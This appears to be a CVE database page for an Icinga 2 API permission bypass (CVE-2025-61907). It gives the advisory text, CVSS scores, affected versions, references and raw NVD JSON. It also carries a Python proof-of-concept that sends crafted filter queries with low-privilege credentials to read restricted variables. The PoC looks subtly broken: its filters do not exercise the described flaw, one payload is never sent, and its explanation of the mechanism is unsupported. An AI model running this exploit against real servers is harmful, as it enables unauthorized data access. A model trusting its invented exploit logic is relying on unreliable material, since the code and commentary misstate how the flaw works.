CVE-2025-61907

Description

Icinga 2 is an open source monitoring system. In Icinga 2 versions 2.4 through 2.15.0, filter expressions provided to the various /v1/objects endpoints could access variables or objects that would otherwise be inaccessible for the user. This allows authenticated API users to learn information that should be hidden from them, including global variables not permitted by the variables permission and objects not permitted by the corresponding objects/query permissions. The vulnerability is fixed in versions 2.15.1, 2.14.7, and 2.13.13.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:icinga:icinga:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:icinga:icinga:2.15.0:*:*:*:*:*:*:* - VULNERABLE

Icinga 2 >= 2.4, < 2.13.13

Icinga 2 >= 2.14.0, < 2.14.7

Icinga 2 >= 2.15.0, < 2.15.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-61907 PoC - Icinga 2 API Object Filter Permission Bypass
# This PoC demonstrates how an authenticated low-privilege user can
# access variables/objects that should be restricted by their permissions

import requests
import json

# Configuration
ICINGA2_HOST = "https://icinga2-target.example.com:5665"
API_USER = "low_privilege_user"
API_PASSWORD = "user_password"
API_ENDPOINT = f"{ICINGA2_HOST}/v1/objects"

# Step 1: Authenticate and obtain API access
# The attacker uses valid low-privilege API credentials
auth_headers = {
    "Accept": "application/json",
    "X-HTTP-Method-Override": "GET"
}

# Step 2: Craft a filter expression that bypasses permission checks
# The filter expression references variables or objects that the user
# should not have permission to access directly
# By using filter expressions, the server evaluates them with elevated
# context, bypassing the normal permission restrictions

# Example 1: Access global variables without variables permission
payload_global_vars = {
    "attrs": ["__name", "value"],
    "filter": "match(\"icinga2\", object_name)",
    "type": "Variable"
}

# Example 2: Access objects without proper objects/query permissions
payload_restricted_objects = {
    "attrs": ["__name", "address", "check_command"],
    # Filter expression that references restricted object types
    "filter": "typeof(object) == \"Host\" && match(\"*\", host_name)",
    "type": "Host"
}

# Step 3: Send the crafted request to the vulnerable endpoint
try:
    response = requests.post(
        API_ENDPOINT,
        auth=(API_USER, API_PASSWORD),
        headers=auth_headers,
        json=payload_global_vars,
        verify=False
    )

    print(f"Status Code: {response.status_code}")
    if response.status_code == 200:
        results = response.json()
        if results.get("results"):
            print("[+] Successfully accessed restricted global variables!")
            for item in results["results"]:
                print(f"  Variable: {item.get('attrs', {}).get('__name')}")
                print(f"  Value: {item.get('attrs', {}).get('value')}")
    else:
        print(f"[-] Request failed: {response.text}")

except Exception as e:
    print(f"[-] Error: {e}")

# Note: The vulnerability exists because the filter expression evaluation
# does not properly enforce permission checks on the variables/objects
# being referenced during the filtering process.
# Fixed in versions: 2.15.1, 2.14.7, 2.13.13

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-61907
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-61907
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-61907/
[4] VulDB https://vuldb.com/cve/CVE-2025-61907
[5] https://github.com/Icinga/icinga2/commit/56255ac7a689b9e198742d2fca6f7459a54c85a3
[6] https://github.com/Icinga/icinga2/security/advisories/GHSA-gg32-w9rm-vp2v

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-61907", "sourceIdentifier": "[email protected]", "published": "2025-10-16T18:15:37.820", "lastModified": "2025-11-26T15:04:24.263", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Icinga 2 is an open source monitoring system. In Icinga 2 versions 2.4 through 2.15.0, filter expressions provided to the various /v1/objects endpoints could access variables or objects that would otherwise be inaccessible for the user. This allows authenticated API users to learn information that should be hidden from them, including global variables not permitted by the variables permission and objects not permitted by the corresponding objects/query permissions. The vulnerability is fixed in versions 2.15.1, 2.14.7, and 2.13.13."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-204"}, {"lang": "en", "value": "CWE-749"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:icinga:icinga:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.4.0", "versionEndExcluding": "2.13.13", "matchCriteriaId": "AB7FAC77-313A-4C70-AE62-17F1D636DF68"}, {"vulnerable": true, "criteria": "cpe:2.3:a:icinga:icinga:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.14.0", "versionEndExcluding": "2.14.7", "matchCriteriaId": "97F3EEA9-4057-4878-878D-AC7936D5C4BF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:icinga:icinga:2.15.0:*:*:*:*:*:*:*", "matchCriteriaId": "686BD1F1-5759-46F8-BAF4-72A481C53D4E"}]}]}], "references": [{"url": "https://github.com/Icinga/icinga2/commit/56255ac7a689b9e198742d2fca6f7459a54c85a3", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/Icinga/icinga2/security/advisories/GHSA-gg32-w9rm-vp2v", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}